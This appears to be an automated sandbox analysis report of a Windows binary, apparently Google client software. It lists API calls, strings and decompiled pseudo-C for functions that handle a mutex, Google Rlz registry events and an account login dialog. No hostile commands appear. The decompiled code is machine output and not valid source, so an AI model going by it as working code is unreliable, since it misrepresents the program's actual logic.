Part of subcall function 0040D290: EnterCriticalSection.KERNEL32(0055F688,?,0040D374,09D48295), ref: 0040D296
Part of subcall function 0040D290: std::_Xinvalid_argument.LIBCPMT ref: 0040D2C6
Part of subcall function 0040D290: SetUnhandledExceptionFilter.KERNEL32(?,0040D374,09D48295), ref: 0040D2D7
Part of subcall function 0040D290: __set_purecall_handler.LIBCMT ref: 0040D2E6
Part of subcall function 0040D290: __set_purecall_handler.LIBCMT ref: 0040D2F4

_memset.LIBCMT ref: 0040D4A1
__snwprintf_s.LIBCMT ref: 0040D4BE
__snwprintf_s.LIBCMT ref: 0040D4DB
__snwprintf_s.LIBCMT ref: 0040D4FC
_memset.LIBCMT ref: 0040D522
_memset.LIBCMT ref: 0040D539
GetModuleHandleW.KERNEL32 ref: 0040D566
GetProcAddress.KERNEL32(00000000), ref: 0040D56D
GetCurrentThreadId.KERNEL32 ref: 0040D5BD
_memset.LIBCMT ref: 0040D683
_memset.LIBCMT ref: 0040D69F
_memset.LIBCMT ref: 0040D6B6
GetModuleHandleW.KERNEL32(kernel32,RtlCaptureContext,?,?,?,?,00000000,00000050,09D48295,?,?), ref: 0040D6DD
GetProcAddress.KERNEL32(00000000), ref: 0040D6E4

Part of subcall function 0040D7A0: EnterCriticalSection.KERNEL32(?,?,0040D3BF,?,00000000), ref: 0040D7A8
Part of subcall function 0040D7A0: LeaveCriticalSection.KERNEL32(?), ref: 0040D7B8

GetCurrentThreadId.KERNEL32 ref: 0040D730

Strings

%, xrefs: 0040D59B
kernel32, xrefs: 0040D551, 0040D6CE
%, xrefs: 0040D70A
RtlCaptureContext, xrefs: 0040D541, 0040D6BE

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$CriticalSection__snwprintf_s$AddressCurrentEnterHandleModuleProcThread__set_purecall_handler$ExceptionFilterLeaveUnhandledXinvalid_argumentstd::_
String ID: %$%$RtlCaptureContext$kernel32
API String ID: 2447371126-3470988165
Opcode ID: 575b970f3ee15948f60ac2b8a53eae4d132df47c2678e7c2ab5e7a38b24aeb8a
Instruction ID: dcef106a13ef2d9668ca6b54267643fe8feb711511c3129ec40615a6bdc7cd9b
Opcode Fuzzy Hash: 575b970f3ee15948f60ac2b8a53eae4d132df47c2678e7c2ab5e7a38b24aeb8a
Instruction Fuzzy Hash: AD9190B1908340AFD720DF61DC45BABB7E8BF94714F004A1DF599672C0EB79A608CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004C43F0, Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 210
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004C43F0(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v0;
				char _v4;
				char _v8;
				char _v12;
				struct _SECURITY_ATTRIBUTES* _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				char _v24;
				void* _v28;
				void* _v32;
				char _v36;
				char _v40;
				short* _v44;
				void* _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				void* _t57;
				void* _t61;
				intOrPtr _t65;
				void* _t72;
				void* _t79;
				void* _t91;
				void* _t101;
				void* _t102;
				signed int _t111;
				void* _t131;
				void* _t135;
				void* _t137;
				void* _t140;
				void* _t143;
				void* _t157;
				void* _t160;
				signed int _t161;
				void* _t162;
				void* _t166;

				_t166 = __eflags;
				_t131 = __edx;
				_push(0xffffffff);
				_push(0x511da8);
				_push( *[fs:0x0]);
				_t161 = _t160 - 0x24;
				_push(_t140);
				_t53 =  *0x5596fc; // 0x9d48295
				_push(_t53 ^ _t161);
				 *[fs:0x0] =  &_v12;
				_t111 = 0;
				_v32 = 0;
				_t135 = CreateMutexW(0, 0, L"{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}");
				_push(_t135);
				_v28 = _t135;
				_t57 = L004C5D10(_t131, _t166);
				_t162 = _t161 + 4;
				if(_t57 != 0) {
					_t111 = 0 | WaitForSingleObject(_t135, 0x1388) == 0x00000000;
					_v32 = 0;
				}
				_v4 = 0;
				if(_t111 == 0) {
					L11:
					_push(_t135);
					goto L31;
				} else {
					_v44 = 0x80000001;
					_v4 = 1;
					if(E004C75E0() != 0) {
						L7:
						_t61 = _v44;
						if(_t61 != 0 && _t61 != 0x80000001) {
							RegCloseKey(_t61);
						}
						ReleaseMutex(_t135);
						goto L11;
					} else {
						if(E004C76D0(1, _t131, _t135, _t140) == 0) {
							L12:
							_v24 = 0;
							_v20 = 0;
							_v16 = 0;
							_v4 = 2;
							_t65 =  *0x559000; // 0x521840
							_t18 = _t65 + 0xc; // 0x4edeb4
							_v48 =  *((intOrPtr*)( *_t18))() + 0x10;
							_push("N");
							_push(L"Events");
							_v4 = 3;
							L004C7EF0( &_v48, L"%s\\%s\\%s", L"Software\\Google\\Common\\Rlz");
							_t162 = _t162 + 0x10;
							_push( &_v24);
							_t133 = 0x2001f;
							_t72 = E00401710(_v48, _v44, 0x2001f);
							__eflags = _t72;
							if(_t72 == 0) {
								_t137 = L004C5E10(_v0);
								_t157 = E004C61E0(_a4);
								__eflags = _t137;
								if(_t137 == 0) {
									L27:
									L004C8A50( &_v52, _t133);
									E00401590( &_v28);
									_t79 = _v48;
									__eflags = _t79;
									if(_t79 != 0) {
										__eflags = _t79 - 0x80000001;
										if(_t79 != 0x80000001) {
											RegCloseKey(_t79);
										}
									}
									_t143 = _v32;
									ReleaseMutex(_t143);
									_push(_t143);
									L31:
									CloseHandle();
									goto L32;
								} else {
									__eflags = _t157;
									if(_t157 == 0) {
										goto L27;
									} else {
										__eflags =  *_t137;
										if( *_t137 == 0) {
											L25:
											L004C8A50( &_v52, _t133);
											E00401590( &_v28);
											L004C7B10( &_v48);
											L004C5DF0( &_v36);
											L32:
											 *[fs:0x0] = _v12;
											return 0;
										} else {
											__eflags = _v0;
											if(_v0 == 0) {
												goto L25;
											} else {
												L0040CC20( &_v44);
												_push(_t157);
												_v8 = 4;
												L004C7EF0( &_v44, L"%s%s", _t137);
												_t162 = _t162 + 0xc;
												RegDeleteValueW(_v28, _v44);
												_t133 =  &_v28;
												_t91 = E00401780( &_v28, _v44);
												__eflags = _t91;
												if(_t91 != 0) {
													L004C8A50( &_v52,  &_v28);
													L004C8A50( &_v52,  &_v28);
													E00401590( &_v28);
													L004C7B10( &_v48);
													L004C5DF0( &_v36);
													 *[fs:0x0] = _v16;
													return 1;
												} else {
													L004C8A50( &_v52,  &_v28);
													goto L25;
												}
											}
										}
									}
								}
							} else {
								L004C8A50( &_v52, 0x2001f);
								_t101 = _v28;
								__eflags = _t101;
								if(_t101 != 0) {
									RegCloseKey(_t101);
								}
								_t102 = _v48;
								__eflags = _t102;
								if(_t102 != 0) {
									__eflags = _t102 - 0x80000001;
									if(_t102 != 0x80000001) {
										RegCloseKey(_t102);
									}
								}
								ReleaseMutex(_t135);
								CloseHandle(_t135);
								 *[fs:0x0] = _v16;
								return 1;
							}
						} else {
							_v40 = 0;
							if(E004C7590(1, _t135,  &_v40) < 0 || _v40 <= 1) {
								goto L7;
							} else {
								goto L12;
							}
						}
					}
				}
			}

0x004c43f0
0x004c43f0
0x004c43f0
0x004c43f2
0x004c43fd
0x004c43fe
0x004c4403
0x004c4405
0x004c440c
0x004c4411
0x004c441f
0x004c4422
0x004c442c
0x004c442e
0x004c442f
0x004c4433
0x004c4438
0x004c443d
0x004c444d
0x004c4450
0x004c4450
0x004c4454
0x004c445a
0x004c44b3
0x004c44b3
0x00000000
0x004c445c
0x004c445c
0x004c4469
0x004c4474
0x004c4496
0x004c4496
0x004c449c
0x004c44a6
0x004c44a6
0x004c44ad
0x00000000
0x004c4476
0x004c447d
0x004c44b9
0x004c44b9
0x004c44bd
0x004c44c1
0x004c44c5
0x004c44ca
0x004c44cf
0x004c44dc
0x004c44e0
0x004c44e5
0x004c44f8
0x004c44fd
0x004c4506
0x004c450d
0x004c4512
0x004c4517
0x004c451c
0x004c451e
0x004c4579
0x004c4584
0x004c4586
0x004c4588
0x004c4653
0x004c4657
0x004c4660
0x004c4665
0x004c4669
0x004c466b
0x004c466d
0x004c4672
0x004c4675
0x004c4675
0x004c4672
0x004c467b
0x004c4680
0x004c4686
0x004c4687
0x004c4687
0x00000000
0x004c458e
0x004c458e
0x004c4590
0x00000000
0x004c4596
0x004c4596
0x004c459a
0x004c45ee
0x004c45f2
0x004c45fb
0x004c4604
0x004c460d
0x004c468d
0x004c4693
0x004c46a2
0x004c459c
0x004c459c
0x004c45a1
0x00000000
0x004c45a3
0x004c45a7
0x004c45ac
0x004c45b5
0x004c45ba
0x004c45c7
0x004c45cc
0x004c45d3
0x004c45dc
0x004c45e5
0x004c45e7
0x004c4614
0x004c461d
0x004c4626
0x004c462f
0x004c4638
0x004c4643
0x004c4652
0x004c45e9
0x004c45e9
0x00000000
0x004c45e9
0x004c45e7
0x004c45a1
0x004c459a
0x004c4590
0x004c4520
0x004c4524
0x004c4529
0x004c4533
0x004c4535
0x004c4538
0x004c4538
0x004c453a
0x004c453e
0x004c4540
0x004c4542
0x004c4547
0x004c454a
0x004c454a
0x004c4547
0x004c454d
0x004c4554
0x004c4560
0x004c456f
0x004c456f
0x004c447f
0x004c4483
0x004c448e
0x00000000
0x00000000
0x00000000
0x00000000
0x004c448e
0x004c447d
0x004c4474

APIs

CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,00000000,?,?,?,?,?,?,00000000,00511DA8,000000FF,004C5986), ref: 004C4426
WaitForSingleObject.KERNEL32(00000000,00001388,?,?,?,?,00000000,00511DA8,000000FF,004C5986,?,?), ref: 004C4445

Part of subcall function 00401710: RegCloseKey.ADVAPI32(?,?,?,004018A8,?), ref: 00401753

RegCloseKey.ADVAPI32(80000001), ref: 004C44A6
ReleaseMutex.KERNEL32(00000000), ref: 004C44AD
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00000000,00511DA8,000000FF,004C5986,?,?), ref: 004C4538

Part of subcall function 00401590: RegCloseKey.ADVAPI32(00000000,00403512,?,?,?,?,?,?,?,?,?,?,?,00510206,000000FF), ref: 00401597

Part of subcall function 004C7B10: RegCloseKey.ADVAPI32(?,004C4AED,00000000,00512DA0,000000FF,004C280F,?,?,?,00000008,?,?,00000005,?,?,?), ref: 004C7B1E

Part of subcall function 004C5DF0: ReleaseMutex.KERNEL32(?,004C4D22,?,00000008,?,?), ref: 004C5DF9
Part of subcall function 004C5DF0: CloseHandle.KERNEL32(?,004C4D22,?,00000008,?,?), ref: 004C5E03

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00000000,00511DA8,000000FF,004C5986,?,?), ref: 004C454A
ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00511DA8,000000FF,004C5986,?,?), ref: 004C454D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00511DA8,000000FF,004C5986,?,?), ref: 004C4554
RegDeleteValueW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00511DA8,000000FF), ref: 004C45CC
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00511DA8,000000FF,004C5986,?,?), ref: 004C4687

Strings

Events, xrefs: 004C44E5
{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}, xrefs: 004C4417
%s%s, xrefs: 004C45AE
%s\%s\%s, xrefs: 004C44EF
Software\Google\Common\Rlz, xrefs: 004C44EA

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Mutex$HandleRelease$CreateDeleteObjectSingleValueWait
String ID: %s%s$%s\%s\%s$Events$Software\Google\Common\Rlz${A946A6A9-917E-4949-B9BC-6BADA8C7FD63}
API String ID: 2167456726-3079574648
Opcode ID: 1d254216676d086cdaa8a4f748ca7973893ce068729b1594c75b236b3883a8f2
Instruction ID: 3363fc7032fdbc6d40adc7411d113ff70fdd47b70ab0890e716b4d12f63f2a4a
Opcode Fuzzy Hash: 1d254216676d086cdaa8a4f748ca7973893ce068729b1594c75b236b3883a8f2
Instruction Fuzzy Hash: 7671EC3A1083409BC350EF25D941B5BBBE8EFE5758F44082EF94193261DB3DE949CA6A

Uniqueness

Uniqueness Score: -1.00%

Function 004475C0, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 202
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004475C0(struct HWND__* __edx, intOrPtr _a4) {
				int _v8;
				char _v16;
				WCHAR* _v24;
				WCHAR* _v28;
				void* __ebx;
				void* __esi;
				signed int _t37;
				int _t44;
				void* _t53;
				intOrPtr _t56;
				void* _t58;
				void* _t60;
				intOrPtr* _t67;
				int _t79;
				intOrPtr _t117;
				struct HWND__* _t119;
				void* _t125;
				int _t126;
				int _t127;
				int _t128;
				struct HWND__** _t129;
				int _t132;
				void* _t133;
				intOrPtr _t135;
				WCHAR* _t140;
				signed int _t142;

				_t115 = __edx;
				_push(0xffffffff);
				_push(0x514c78);
				_push( *[fs:0x0]);
				_t37 =  *0x5596fc; // 0x9d48295
				_push(_t37 ^ (_t142 & 0xfffffff8) - 0x00000008);
				 *[fs:0x0] =  &_v16;
				_t135 = _a4;
				_t125 = _t135 + 0x20;
				if(_t125 == 0) {
					_t126 = 0;
					__eflags = 0;
				} else {
					_t126 = _t125 + 0xffffffe0;
				}
				if(SetDlgItemTextW( *(_t126 + 4), 0x452,  *(_t135 + 0x24)) != 0) {
					_t127 = _t135 + 0x20;
					__eflags = _t127;
					if(_t127 == 0) {
						_t128 = 0;
						__eflags = 0;
					} else {
						_t128 = _t127 + 0xffffffe0;
					}
					_t115 =  *(_t128 + 4);
					_t44 = SetDlgItemTextW( *(_t128 + 4), 0x453,  *(_t135 + 0x28));
					__eflags = _t44;
					if(_t44 != 0) {
						goto L16;
					} else {
						MessageBeep(0xffffffff);
						_t132 = _t128 + 0x20;
						__eflags = _t132;
						if(_t132 == 0) {
							_t79 = 0;
							__eflags = 0;
						} else {
							_t12 = _t132 - 0x20; // -64
							_t79 = _t12;
						}
						_push(0x453);
						_push( *((intOrPtr*)(_t79 + 4)));
						goto L15;
					}
				} else {
					MessageBeep(0xffffffff);
					_t133 = _t126 + 0x20;
					_t149 = _t133;
					if(_t133 == 0) {
						_push(0x452);
						_push( *0x00000004);
					} else {
						_push(0x452);
						_push( *((intOrPtr*)(_t133 - 0x1c)));
					}
					L15:
					SetFocus(GetDlgItem());
					L16:
					_t129 = _t135 + 4;
					CheckDlgButton( *(_t135 + 4), 0x3f3, 1);
					L00447AD0(_t115, _t135);
					E004471C0(_t129);
					_t136 = _t135 + 0x30;
					 *((intOrPtr*)(_t135 + 0x84)) = 0x40;
					L004489F0(_t135 + 0x30, L"https://www.google.com/accounts/NewAccount?service=goopy&hl=zh-CN", _t115, _t149);
					_t116 =  *_t129;
					if(E0044A1F0(GetDlgItem( *_t129, 0x454), _t135 + 0x30) != 0) {
						E004492A0(_t136);
					}
					_t138 = _a4 + 0x8c;
					 *((intOrPtr*)(_a4 + 0xe0)) = 0x40;
					_t53 = E0044A1F0(GetDlgItem( *_t129, 0x455), _a4 + 0x8c);
					_t151 = _t53;
					if(_t53 != 0) {
						E004492A0(_t138);
					}
					L004489F0(_t138, L"https://www.google.com/accounts/ForgotPasswd?service=goopy&hl=zh-CN", _t116, _t151);
					_t117 =  *((intOrPtr*)(_a4 + 0x24));
					_t152 =  *((intOrPtr*)(_t117 - 0xc));
					if( *((intOrPtr*)(_t117 - 0xc)) == 0) {
						 *[fs:0x0] = _v16;
						return 1;
					} else {
						_t56 =  *0x559000; // 0x521840
						_t22 = _t56 + 0xc; // 0x4edeb4
						_t118 =  *_t22;
						_t23 =  *((intOrPtr*)( *_t22))() + 0x10; // 0x10
						_t140 = _t23;
						_v24 = _t140;
						_v8 = 0;
						_t58 = L00410DE0(_t152, 0x74);
						_t103 = _t58;
						_t153 = _t58;
						if(_t58 != 0) {
							L00410F90(0x74, _t103, _t118,  &_v24);
							_t140 = _v28;
						}
						SetWindowTextW( *_t129, _t140);
						_t60 = L00410DE0(_t153, 0x75);
						_t105 = _t60;
						if(_t60 != 0) {
							L00410F90(0x75, _t105,  &_v24,  &_v24);
							_t140 = _v28;
						}
						SetDlgItemTextW( *_t129, 0x456, _t140);
						SetFocus(GetDlgItem( *_t129, 0x453));
						_t119 =  *_t129;
						ShowWindow(GetDlgItem(_t119, 0x3f3), 5);
						_t30 = _t140 - 0x10; // 0x0
						_t67 = _t30;
						_v8 = 0xffffffff;
						asm("lock xadd [ecx], edx");
						if((_t119 | 0xffffffff) - 1 <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t67)) + 4))))(_t67);
						}
						 *[fs:0x0] = _v16;
						return 0;
					}
				}
			}

0x004475c0
0x004475c6
0x004475c8
0x004475d3
0x004475da
0x004475e1
0x004475e6
0x004475ec
0x004475ef
0x004475f4
0x004475fb
0x004475fb
0x004475f6
0x004475f6
0x004475f6
0x00447614
0x0044763e
0x00447641
0x00447643
0x0044764a
0x0044764a
0x00447645
0x00447645
0x00447645
0x0044764f
0x00447659
0x0044765b
0x0044765d
0x00000000
0x0044765f
0x00447661
0x00447667
0x00447667
0x0044766a
0x00447671
0x00447671
0x0044766c
0x0044766c
0x0044766c
0x0044766c
0x00447676
0x0044767b
0x00000000
0x0044767b
0x00447616
0x00447618
0x0044761e
0x0044761e
0x00447621
0x00447636
0x0044763b
0x00447623
0x00447629
0x0044762e
0x0044762e
0x0044767c
0x00447683
0x00447689
0x0044768e
0x00447697
0x0044769d
0x004476a4
0x004476a9
0x004476b3
0x004476ba
0x004476bf
0x004476d6
0x004476da
0x004476da
0x004476e2
0x004476e8
0x004476ff
0x00447704
0x00447706
0x0044770a
0x0044770a
0x00447716
0x0044771e
0x00447721
0x00447725
0x00447816
0x00447824
0x0044772b
0x0044772b
0x00447730
0x00447730
0x0044773a
0x0044773a
0x0044773d
0x00447743
0x0044774b
0x00447750
0x00447755
0x00447757
0x00447763
0x00447768
0x00447768
0x00447770
0x00447778
0x0044777d
0x00447784
0x00447790
0x00447795
0x00447795
0x004477a2
0x004477b9
0x004477bf
0x004477cc
0x004477d2
0x004477d2
0x004477d5
0x004477e3
0x004477ea
0x004477f4
0x004477f4
0x004477fc
0x0044780a
0x0044780a
0x00447725

APIs

SetDlgItemTextW.USER32 ref: 00447610
MessageBeep.USER32(000000FF), ref: 00447618
GetDlgItem.USER32 ref: 0044767C
SetFocus.USER32(00000000), ref: 00447683
CheckDlgButton.USER32(?,000003F3,00000001), ref: 00447697
GetDlgItem.USER32 ref: 004476C7
GetDlgItem.USER32 ref: 004476F7
SetWindowTextW.USER32(00000000,00000010), ref: 00447770
SetDlgItemTextW.USER32 ref: 004477A2
GetDlgItem.USER32 ref: 004477B6
SetFocus.USER32(00000000,?,00000453), ref: 004477B9
GetDlgItem.USER32 ref: 004477C7
ShowWindow.USER32(00000000,00000005,?,000003F3,?,00000453), ref: 004477CC

Strings

https://www.google.com/accounts/ForgotPasswd?service=goopy&hl=zh-CN, xrefs: 0044770F
https://www.google.com/accounts/NewAccount?service=goopy&hl=zh-CN, xrefs: 004476AC

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Text$FocusWindow$BeepButtonCheckMessageShow
String ID: https://www.google.com/accounts/ForgotPasswd?service=goopy&hl=zh-CN$https://www.google.com/accounts/NewAccount?service=goopy&hl=zh-CN
API String ID: 188825679-1338281193
Opcode ID: 67bedfe663c1ed3b270cec0cef657b75b9fcbb6d850d596a0e86654c2d693596
Instruction ID: c65a61f1653cf146aaab41092458ce8f70ad9666dfa818d69d7c21afcd1342b0
Opcode Fuzzy Hash: 67bedfe663c1ed3b270cec0cef657b75b9fcbb6d850d596a0e86654c2d693596
Instruction Fuzzy Hash: B661E4B5704B019BE310DB68CC45B1BB7A5FF98725F00861AFA15873D1EB78E806CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004C3630, Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 198
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004C3630(int* __edx, void* __ebp, void* __eflags) {
				char _v4;
				char _v8;
				char _v12;
				signed int _v16;
				char _v28;
				short _v32;
				int _v36;
				int* _v40;
				char _v44;
				void* _v48;
				void* _v52;
				char _v56;
				int* _v60;
				void* _v64;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t52;
				signed int _t54;
				void* _t58;
				char _t60;
				intOrPtr _t63;
				void* _t70;
				intOrPtr* _t74;
				void* _t75;
				signed int _t82;
				void* _t83;
				void* _t90;
				void* _t91;
				void* _t95;
				signed int _t100;
				void* _t101;
				void* _t102;
				signed int _t109;
				void* _t119;
				void* _t120;
				int _t121;
				void* _t123;
				void* _t124;
				void* _t126;
				void* _t133;
				signed int _t134;
				signed int _t135;
				void* _t137;

				_t137 = __eflags;
				_t116 = __edx;
				_push(0xffffffff);
				_push(0x5174d0);
				_push( *[fs:0x0]);
				_t134 = _t133 - 0x34;
				_t52 =  *0x5596fc; // 0x9d48295
				_v16 = _t52 ^ _t134;
				_t54 =  *0x5596fc; // 0x9d48295
				_push(_t54 ^ _t134);
				 *[fs:0x0] =  &_v12;
				_t100 = 0;
				_v52 = 0;
				_t119 = CreateMutexW(0, 0, L"{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}");
				_push(_t119);
				_v48 = _t119;
				_t58 = L004C5D10(_t116, _t137);
				_t135 = _t134 + 4;
				if(_t58 != 0) {
					_t100 = 0 | WaitForSingleObject(_t119, 0x1388) == 0x00000000;
					_v52 = 0;
				}
				_v4 = 0;
				if(_t100 == 0) {
					L8:
					CloseHandle(_t119);
					_t60 = 0;
					L33:
					 *[fs:0x0] = _v12;
					_pop(_t120);
					_pop(_t123);
					_pop(_t101);
					return L004EEDC9(_t60, _t101, _v16 ^ _t135, _t116, _t120, _t123);
				}
				_v60 = 0x80000001;
				_v4 = 1;
				if(E004C75E0() == 0) {
					_v44 = 0;
					_v40 = 0;
					_v36 = 0;
					_v4 = 2;
					_t63 =  *0x559000; // 0x521840
					_t16 = _t63 + 0xc; // 0x4edeb4
					_v64 =  *((intOrPtr*)( *_t16))() + 0x10;
					_push("N");
					_push(L"Events");
					_v4 = 3;
					L004C7EF0( &_v64, L"%s\\%s\\%s", L"Software\\Google\\Common\\Rlz");
					_t135 = _t135 + 0x10;
					_push( &_v44);
					_t116 = 0x20019;
					_t70 = E00401710(_v64, _v60, 0x20019);
					__eflags = _t70;
					if(_t70 == 0) {
						_t102 = _v48;
						_t121 = 0;
						__eflags = 0;
						do {
							_t116 =  &_v36;
							_t109 = 0;
							_v32 = 0;
							_v36 = 5;
							_t124 = RegEnumValueW(_t102, _t121,  &_v32,  &_v36, 0, 0, 0, 0);
							__eflags = _t124;
							if(_t124 != 0) {
								goto L23;
							}
							_t82 = 0;
							__eflags = _v32;
							if(_v32 == 0) {
								goto L23;
							} else {
								goto L19;
							}
							do {
								L19:
								_t82 = _t82 + 1;
								__eflags =  *(_t135 + 0x38 + _t82 * 2);
							} while ( *(_t135 + 0x38 + _t82 * 2) != 0);
							__eflags = _t82 - 3;
							if(_t82 != 3) {
								goto L23;
							}
							_t109 =  &_v28;
							_v60 = 0;
							_t83 = E004C6230(_t109,  &_v60);
							_t135 = _t135 + 4;
							__eflags = _t83;
							if(_t83 == 0) {
								goto L23;
							}
							__eflags = _v60 - 4;
							if(_v60 == 4) {
								L004C8A50( &_v68,  &_v36);
								E00401590( &_v48);
								L004C7B10( &_v64);
								L004C5DF0( &_v56);
								_t60 = 0;
								goto L33;
							}
							L23:
							_t121 = _t121 + 1;
							__eflags = _t124;
						} while (_t124 == 0);
						_v8 = 2;
						_t74 = _v68 + 0xfffffff0;
						_t41 = _t74 + 0xc; // -228
						_t116 = _t41;
						asm("lock xadd [edx], ecx");
						__eflags = (_t109 | 0xffffffff) - 1;
						if((_t109 | 0xffffffff) - 1 <= 0) {
							_t116 =  *((intOrPtr*)( *_t74));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t74)) + 4))))(_t74);
						}
						__eflags = _t102;
						if(_t102 != 0) {
							RegCloseKey(_t102);
						}
						_t75 = _v64;
						__eflags = _t75;
						if(_t75 != 0) {
							__eflags = _t75 - 0x80000001;
							if(_t75 != 0x80000001) {
								RegCloseKey(_t75);
							}
						}
						_t126 = _v52;
						ReleaseMutex(_t126);
						_push(_t126);
						L32:
						CloseHandle();
						_t60 = 1;
						goto L33;
					}
					L004C8A50( &_v68, 0x20019);
					_t90 = _v48;
					__eflags = _t90;
					if(_t90 != 0) {
						RegCloseKey(_t90);
					}
					_t91 = _v64;
					__eflags = _t91;
					if(_t91 != 0) {
						__eflags = _t91 - 0x80000001;
						if(_t91 != 0x80000001) {
							RegCloseKey(_t91);
						}
					}
					ReleaseMutex(_t119);
					_push(_t119);
					goto L32;
				}
				_t95 = _v60;
				if(_t95 != 0 && _t95 != 0x80000001) {
					RegCloseKey(_t95);
				}
				ReleaseMutex(_t119);
				goto L8;
			}

0x004c3630
0x004c3630
0x004c3630
0x004c3632
0x004c363d
0x004c363e
0x004c3641
0x004c3648
0x004c3650
0x004c3657
0x004c365c
0x004c366a
0x004c366d
0x004c3677
0x004c3679
0x004c367a
0x004c367e
0x004c3683
0x004c3688
0x004c3698
0x004c369b
0x004c369b
0x004c369f
0x004c36a5
0x004c36da
0x004c36db
0x004c36e1
0x004c384e
0x004c3852
0x004c385a
0x004c385b
0x004c385d
0x004c386c
0x004c386c
0x004c36a7
0x004c36af
0x004c36bb
0x004c36e8
0x004c36ec
0x004c36f0
0x004c36f4
0x004c36f9
0x004c36fe
0x004c370b
0x004c370f
0x004c3714
0x004c3727
0x004c372c
0x004c3735
0x004c373c
0x004c3741
0x004c3746
0x004c374b
0x004c374d
0x004c3788
0x004c378c
0x004c378c
0x004c3790
0x004c3794
0x004c379f
0x004c37a2
0x004c37a7
0x004c37b5
0x004c37b7
0x004c37b9
0x00000000
0x00000000
0x004c37bb
0x004c37bd
0x004c37c2
0x00000000
0x00000000
0x00000000
0x00000000
0x004c37c4
0x004c37c4
0x004c37c4
0x004c37c5
0x004c37c5
0x004c37cc
0x004c37cf
0x00000000
0x00000000
0x004c37d6
0x004c37da
0x004c37de
0x004c37e3
0x004c37e6
0x004c37e8
0x00000000
0x00000000
0x004c37ea
0x004c37ef
0x004c3871
0x004c387a
0x004c3883
0x004c388c
0x004c3891
0x00000000
0x004c3891
0x004c37f1
0x004c37f1
0x004c37f2
0x004c37f2
0x004c37f6
0x004c37ff
0x004c3802
0x004c3802
0x004c3808
0x004c380d
0x004c380f
0x004c3813
0x004c3819
0x004c3819
0x004c3821
0x004c3823
0x004c3826
0x004c3826
0x004c3828
0x004c382c
0x004c382e
0x004c3830
0x004c3835
0x004c3838
0x004c3838
0x004c3835
0x004c383a
0x004c383f
0x004c3845
0x004c3846
0x004c3846
0x004c384c
0x00000000
0x004c384c
0x004c3753
0x004c3758
0x004c3762
0x004c3764
0x004c3767
0x004c3767
0x004c3769
0x004c376d
0x004c376f
0x004c3771
0x004c3776
0x004c3779
0x004c3779
0x004c3776
0x004c377c
0x004c3782
0x00000000
0x004c3782
0x004c36bd
0x004c36c3
0x004c36cd
0x004c36cd
0x004c36d4
0x00000000

APIs

CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,?,09D48295,?,00000000), ref: 004C3671
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004C3690

Part of subcall function 00401710: RegCloseKey.ADVAPI32(?,?,?,004018A8,?), ref: 00401753

RegCloseKey.ADVAPI32(80000001), ref: 004C36CD
ReleaseMutex.KERNEL32(00000000), ref: 004C36D4
CloseHandle.KERNEL32(00000000), ref: 004C36DB
